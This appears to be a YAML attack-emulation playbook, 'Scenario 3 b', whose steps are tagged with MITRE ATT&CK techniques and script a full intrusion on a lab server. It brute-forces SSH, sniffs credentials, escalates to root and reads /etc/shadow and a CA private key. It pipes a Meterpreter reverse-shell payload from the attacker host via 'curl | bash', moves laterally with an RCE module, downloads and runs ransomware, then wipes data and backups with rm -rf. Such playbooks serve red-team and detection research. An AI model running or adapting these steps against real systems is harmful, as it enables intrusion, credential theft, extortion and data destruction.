####################
#
# Scenario 3 b
#
####################
vars:
  $SERVER_ADDRESS: 192.42.0.254
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233

commands:
  - type: shell
    cmd: hydra -C user_pass_combo.txt -s 10022 $SERVER_ADDRESS ssh  
    metadata:
      techniques: "T1078,T1110,T1133"
      tactics: "Initial Access"

  - type: ssh
    creates_session: foothold
    username: john
    password: rambo
    hostname: $SERVER_ADDRESS
    port: 10022
    cmd: id
    metadata:
      techniques: "T1078"
      tactics: "Initial Access"

  - type: ssh
    session: foothold
    cmd: "tcpdump -A port 21\n"
    interactive: True
    metadata:
      techniques: "T1040"
      tactics: "Credential Access"

  - type: sleep
    seconds: 20

  - type: ssh
    session: foothold
    cmd: "03"
    interactive: True
    bin: True

  - type: ssh
    session: foothold
    cmd: "sudo -i\n"
    interactive: True
    metadata:
      techniques: "T1078"
      tactics: "Privilege Escalation"

  - type: ssh
    session: foothold
    cmd: "rambo\n"
    interactive: True
    metadata:
      techniques: "T1078"
      tactics: "Privilege Escalation"

  - type: ssh
    session: foothold
    cmd: "id\n"
    interactive: True

  - type: ssh
    session: foothold
    cmd: "cat /etc/shadow\n"
    interactive: True
    metadata:
      techniques: "T1003"
      tactics: "Credential Access"

  - type: ssh
    session: foothold
    cmd: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem\n"
    interactive: True
    metadata:
      techniques: "T1213"
      tactics: "Collection"

  - type: ssh
    session: foothold
    cmd: "cat /media/share/healthcheck_cron.sh\n"
    interactive: True
    metadata:
      techniques: "T1039"
      tactics: "Collection"

  - type: mktemp
    cmd: file
    variable: RSHELL

  - type: msf-payload
    cmd: cmd/unix/python/meterpreter/reverse_tcp
    payload_options:
      LHOST: $ATTACKER_ADDRESS
      LPORT: "4444"
    local_path: $RSHELL

  - type: msf-module
    creates_session: portforward
    cmd: exploit/multi/handler
    payload: "cmd/unix/python/meterpreter/reverse_tcp"
    payload_options:
      LHOST: $ATTACKER_ADDRESS
      LPORT: "4444"
    background: true
    kill_on_exit: true

  - type: webserv
    local_path: $RSHELL
    port: 8888
    background: True
    kill_on_exit: true

  - type: ssh
    cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash"
    background: True
    metadata:
      techniques: "T1071, T1105"
      tactics: "Execution, Command and Control"

  - type: msf-session
    session: portforward
    cmd: sysinfo
    metadata:
      techniques: "T1082"
      tactics: "Discovery"

  - type: msf-session
    session: portforward
    cmd: portfwd add -l 1881 -r 192.168.100.23 -p 1881
    metadata:
      techniques: "T1572"
      tactics: "Command and Control"

  - type: msf-module
    creates_session: movement
    cmd: exploit/linux/misc/healthcheck_rce
    payload: "cmd/linux/http/x64/meterpreter_reverse_tcp"
    payload_options:
      LHOST: $ATTACKER_ADDRESS
      LPORT: "4444"
    options:
      RHOSTS: 127.0.0.1  
    metadata:
      techniques: "T1210"
      tactics: "Lateral Movement"

#################### MOVED ################################
  - type: msf-session
    session: movement
    cmd: shell

  # Prepare for upgradeshell
  - type: setvar
    cmd: movement
    variable: $UPGRADESESSION

  - type: include
    local_path: upgrade.yml

  - type: msf-session
    session: movement
    cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry
    metadata:
      techniques: "T1486"
      tactics: "Impact"

  - type: msf-session
    session: movement
    cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images
    metadata:
      techniques: "T1486,T1565"
      tactics: "Impact"

  - type: msf-session
    session: movement
    cmd: find /media/data/Images
    metadata:
      techniques: "T1018"
      tactics: "Discovery"

  - type: msf-session
    session: movement
    cmd: cat /etc/passwd
    metadata:
      techniques: "T1087"
      tactics: "Discovery"
  
  - type: msf-session
    session: movement
    cmd: userdel -f john
    metadata:
      techniques: "T1531"
      tactics: "Impact"
  
  - type: msf-session
    session: movement
    cmd: rm -rf /media/data/*
    metadata:
     techniques: "T1485"
     tactics: "Impact"
  
  - type: msf-session
    session: movement
    cmd: rm -rf /var/backups/*
    metadata:
     techniques: "T1490"
     tactics: "Impact"

  - type: msf-session
    session: movement
    cmd: systemctl stop exim4.service
    metadata:
     techniques: "T1489"
     tactics: "Impact"
